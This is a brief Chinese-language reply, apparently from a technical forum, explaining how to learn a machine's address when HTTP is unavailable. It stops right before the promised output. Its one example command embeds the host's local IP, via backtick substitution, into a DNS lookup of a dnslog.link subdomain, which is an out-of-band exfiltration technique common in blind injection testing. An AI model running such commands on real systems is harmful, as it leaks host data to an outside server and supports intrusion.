这个从协议上是拿不到原始请求的地址的。如果你没法使用 http 请求，可以通过命令聚合方式拿到你要的地址。

举个例子，测试环境在 mac osx 下，Linux 有所不同需要略微调整：

ping -c 3 `ifconfig en0|grep "inet "|awk '{print $2}'`.test.dnslog.link

效果如下：
